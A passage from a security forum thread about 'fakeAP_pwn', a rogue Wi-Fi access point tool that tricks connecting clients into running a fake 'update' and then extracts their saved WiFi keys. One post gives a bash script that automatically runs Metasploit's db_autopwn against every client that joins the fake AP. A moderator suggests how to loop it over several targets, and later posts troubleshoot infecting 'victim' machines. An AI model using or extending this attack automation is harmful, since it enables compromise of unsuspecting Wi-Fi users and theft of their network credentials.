
Thread: [Script] [Video] fakeAP_pwn (v0.3)

  1. #91
    Senior Member
    Join Date
    May 2010
    Posts
    198

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    I'm not a huge fan of autopwn, but many like it because it's like shooting a machine gun. I'm trying to add a feature to the script to add a remote exploit like spoolss, so when it finds a connection it automatically tries the exploit against the attached client. Here is what I have so far.

    Code:
    #!/bin/bash
    echo "#!/bin/bash" >> /tmp/msf.sh
    echo "/pentest/exploits/framework3/msfconsole -r /tmp/own.rc" >> /tmp/msf.sh
    chmod 777 /tmp/msf.sh
    /etc/init.d/postgresql-8.3 start
    sleep 5
    for (( ; ; ))
    do
       arp | grep "at0" | awk '{print $1}' >> /tmp/iplist.lst
       iplist="$(cat /tmp/iplist.lst | awk -v line=1 'NR == line { print $0 }')"
       if [ "$iplist" != "" ] ; then
          echo "db_create /tmp/mynet.db" >> /tmp/own.rc
          echo "db_nmap -sS -F -n $iplist -T3" >> /tmp/own.rc
          echo "setg AutoRunScript scraper" >> /tmp/own.rc
          echo "db_autopwn -t -e -p -r" >> /tmp/own.rc
          xterm -hold -geometry 75x10+10+100 -T "fakeAP_pwn" -e "/tmp/msf.sh" &
          echo "exploiting $iplist"
          ipall="$iplist"
          rm -f /tmp/iplist.lst
          break;
       else
          sleep 10
          echo "Checking..."
       fi
    done
    sleep 20
    #rm -f /tmp/msf.sh
    #rm -f /tmp/own.rc
    #rm -f /tmp/iplist.lst
    I want to loop this so it adds addresses automatically, then tries the exploit, then ignores the MAC once it has a terminal. Any suggestions to improve this? I wrote this around HD Moore's ownitall.rc file.
    It works against one target so far.
    Last edited by Scamentology; 11-04-2010 at 04:53 AM.
    "Never do anything against conscience -- even if the state demands it."
    -- Albert Einstein

  2. #92
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    WITHOUT testing.... Doing a once-over on the code, it looks like it doesn't keep a record of which IPs it's tested (ipall has a value, but it's not used?)
    Would you also need to loop it for each value of iplist?
    Code:
    for target in "${iplist[@]}" ; do
       echo "Attacking $target"
    done
    I've had a few ideas on how to do this; however, I'm away from my lab for the next few weeks, so I'm unable to test anything. )=
    Once fakeAP_pwn v0.4 is out - its main update feature should be multiple client support - so it wouldn't be too hard to mod it for your needs.
    Have you...g0tmi1k?

  3. #93
    Senior Member
    Join Date
    May 2010
    Posts
    198

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    Quote: Originally Posted by g0tmi1k
    WITHOUT testing.... Doing a once-over on the code, it looks like it doesn't keep a record of which IPs it's tested (ipall has a value, but it's not used?)
    Would you also need to loop it for each value of iplist?
    I would like it to grab the first IP, then attack it, then move on to the next, but ignore them if they came back up in the list. I don't want to attack the same machine over and over with the same exploit.
    ipall was supposed to be for the next part of the script, but with your suggestion it is not necessary. Thanks for the tip.

    Code:
    for target in "${iplist[@]}" ; do
       echo "Attacking $target"
    done
    Ahhhh, thanks. That's what I was trying to do. 3 or 4 weeks ago I had never looked inside a script of any sort, so it's a learning process. I spent all night reading about looping.

    I've had a few ideas on how to do this; however, I'm away from my lab for the next few weeks, so I'm unable to test anything. )=
    Once fakeAP_pwn v0.4 is out - its main update feature should be multiple client support - so it wouldn't be too hard to mod it for your needs.
    Can't wait!!
    "Never do anything against conscience -- even if the state demands it."
    -- Albert Einstein

  4. #94
    Junior Member Liuser's Avatar
    Join Date
    Apr 2010
    Posts
    58

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    Script works great - I noticed that you want to incorporate support for OSX in the future. Have you been able to connect to the fake AP using OSX and have the DHCP issue an IP? It is the problem that I am experiencing right now (Windows get IP just fine from DHCP, but OSX does not). I just wanted to verify that this was the main problem you are having right now as I am trying to solve it. Thanks!

  5. #95
    Member joker5bb's Avatar
    Join Date
    Feb 2010
    Posts
    166

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    If you are going to run this script in Ubuntu, make sure to install the xtightvncviewer package.
    A detailed wiki page is soon to come.

  6. #96
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    Quote: Originally Posted by Liuser
    Script works great - I noticed that you want to incorporate support for OSX in the future. Have you been able to connect to the fake AP using OSX and have the DHCP issue an IP? It is the problem that I am experiencing right now (Windows get IP just fine from DHCP, but OSX does not). I just wanted to verify that this was the main problem you are having right now as I am trying to solve it. Thanks!
    Yes yes yes! It's been coded into it since v0.1. I hope to start work on Linux/OSX support for v0.5/v0.6.

    I don't have OSX at the mo, so I'm unable to test it out. Funny that Windows works, whereas OSX doesn't.
    */me wonders what OSX needs that Windows doesn't*
    Can OSX connect to the AP? What happens on the AP and/or DHCP window? Are you able to send the log file?



    Quote: Originally Posted by joker5bb
    If you are going to run this script in Ubuntu, make sure to install the xtightvncviewer package.
    A detailed wiki page is soon to come.
    Thanks for pointing that out about VNC. Just a few things though, doesn't the script not automatically detect/install it? Does it not come out-of-the-box with Ubuntu 10.10?
    Have you...g0tmi1k?

  7. #97
    Senior Member
    Join Date
    Jan 2010
    Posts
    173

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    Hi all, I wonder if you can help me?

    I'm running the latest Fakeap 0.3 and all works well, but I get the following error when it tries to open the wkv keys. This never happened before with earlier versions:

    Keep up the great work tho g0tmi1k, the internet reinstate works great too.

    [*] fakeAP_pwn v0.3 (#126)
    [>] Analyzing: Environment
    [>] Configuring: Environment
    [>] Creating: Scripts
    [>] Creating: Exploit (Windows)
    [>] Creating: Access point
    [>] Configuring: Network
    [>] Starting: DHCP
    [>] Starting: DNS
    [>] Starting: Exploit
    [>] Starting: Web server
    [i] Waiting for the target to run the "update" file
    [i] Target infected!
    [>] Restoring: Internet access
    [>] Opening: WiFi Keys
    [!] action. Error code: 5 <------------------------------------------(error)
    [>] Restoring: Environment
    [*] Done! (= Have you... g0tmi1k?
    root@bt:~/FAP_0.3_126#

    Kind Regards Dee

  8. #98
    Member
    Join Date
    Feb 2009
    Location
    0,0
    Posts
    90

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    I had the same error code and it never created the /tmp/ folder where it places the wkv log file. When I ran the script with -d for diagnostics, the folder was created and the log file was there. I can't remember if the script still gave me the error code though. Maybe give it a try with -d and see what happens.

  9. #99
    Just burned his ISO
    Join Date
    Dec 2009
    Posts
    6

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    Hi

    Congratulations on the awesome tool. I have BackTrack 4-Beta running on my VM (attacker system) and a victim laptop with Windows Vista.

    On the VM I have an Alfa card (rtl8187), and I also used an Edimax just to make sure it was not the problem, and it's not, because I get the same behaviour with both.

    On my VM I don't have internet access, just the fake AP. I don't want to allow internet access (since I don't have it); I just want to force clients to download our binary, that's all.

    I have tested the default configuration and changed it a bit, but the problem persists. It sets up all the stuff and I see client requests, clients associating, and I see the MAC address being shown, but very quickly it changes to incomplete.

    On the victim system it connects fine, and gets the IP and the gateway with the IP of the attacker computer (10.0.0.1), but I can't ping or access anything on the attacker computer. Strangely enough, when I call arp -a on Windows Vista I don't see the fake AP MAC, and I only see a network MAC with very strange numbers like a bunch of ff...

    The machines are in the connected state, but I can't ping or do anything; there is no connectivity, but I got the DHCP address correctly, etc.

    This is very strange. I tested another laptop as victim and the same happens.

    I called the script with -d and -v and I can't figure out why. I posted a copy of the whole log here:

    RAW OUTPUT fsdhjEjK

    Ideas? Suggestions?

    Also, why does WPATARGET, the network that I want to gain access to, probe me constantly but never associate?

    Because I have a different ESSID and BSSID?

    Or because WPATARGET is protected by WAP and my fake AP is not, and the client will just refuse it?

    Or because my signal is weaker?

    Thanks

  10. #100
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Script] [Video] fakeAP_pwn (v0.3)

    Quote: Originally Posted by pentest09
    Hi all, I wonder if you can help me?

    I'm running the latest Fakeap 0.3 and all works well, but I get the following error when it tries to open the wkv keys. This never happened before with earlier versions:

    Keep up the great work tho g0tmi1k, the internet reinstate works great too.

    [*] fakeAP_pwn v0.3 (#126)
    [>] Analyzing: Environment
    [>] Configuring: Environment
    [>] Creating: Scripts
    [>] Creating: Exploit (Windows)
    [>] Creating: Access point
    [>] Configuring: Network
    [>] Starting: DHCP
    [>] Starting: DNS
    [>] Starting: Exploit
    [>] Starting: Web server
    [i] Waiting for the target to run the "update" file
    [i] Target infected!
    [>] Restoring: Internet access
    [>] Opening: WiFi Keys
    [!] action. Error code: 5 <------------------------------------------(error)
    [>] Restoring: Environment
    [*] Done! (= Have you... g0tmi1k?
    root@bt:~/FAP_0.3_126#

    Kind Regards Dee
    Thanks for reporting this - I'll push an update out later today. (=



    Quote: Originally Posted by cseven
    I had the same error code and it never created the /tmp/ folder where it places the wkv log file. When I ran the script with -d for diagnostics, the folder was created and the log file was there. I can't remember if the script still gave me the error code though. Maybe give it a try with -d and see what happens.
    It now doesn't use /tmp anymore. It SHOULD now create a temp folder in the SAME path as fakeAP_pwn ./tmp/



    Quote: Originally Posted by rick.m
    Hi

    Congratulations on the awesome tool. I have BackTrack 4-Beta running on my VM (attacker system) and a victim laptop with Windows Vista.

    On the VM I have an Alfa card (rtl8187), and I also used an Edimax just to make sure it was not the problem, and it's not, because I get the same behaviour with both.

    On my VM I don't have internet access, just the fake AP. I don't want to allow internet access (since I don't have it); I just want to force clients to download our binary, that's all.

    I have tested the default configuration and changed it a bit, but the problem persists. It sets up all the stuff and I see client requests, clients associating, and I see the MAC address being shown, but very quickly it changes to incomplete.

    On the victim system it connects fine, and gets the IP and the gateway with the IP of the attacker computer (10.0.0.1), but I can't ping or access anything on the attacker computer. Strangely enough, when I call arp -a on Windows Vista I don't see the fake AP MAC, and I only see a network MAC with very strange numbers like a bunch of ff...

    The machines are in the connected state, but I can't ping or do anything; there is no connectivity, but I got the DHCP address correctly, etc.

    This is very strange. I tested another laptop as victim and the same happens.

    I called the script with -d and -v and I can't figure out why. I posted a copy of the whole log here:

    RAW OUTPUT fsdhjEjK

    Ideas? Suggestions?

    Also, why does WPATARGET, the network that I want to gain access to, probe me constantly but never associate?

    Because I have a different ESSID and BSSID?

    Or because WPATARGET is protected by WAP and my fake AP is not, and the client will just refuse it?

    Or because my signal is weaker?

    Thanks
    Okay, try setting the mode to "non", as you don't want to allow an Internet connection after becoming infected.
    A lot of clients are trying to connect/probing... That might be an issue.
    You're also using a VM as well as airbase-ng. Both of these have issues.

    I'm guessing the "arp -a on windows" issue is because of airbase-ng. Not 100% sure mind you.
    Does the target have a gateway IP? DNS?

    I don't understand what you're saying about "WPATARGET".
    The fakeAP you created was called "Free-WiFi", "WPATARGET" is scanning for networks (hence its probing). [So yes, the ESSID are different?]
    The fakeAP you create is "Open", I have no idea if "WPATARGET" is protected.
    Have you...g0tmi1k?
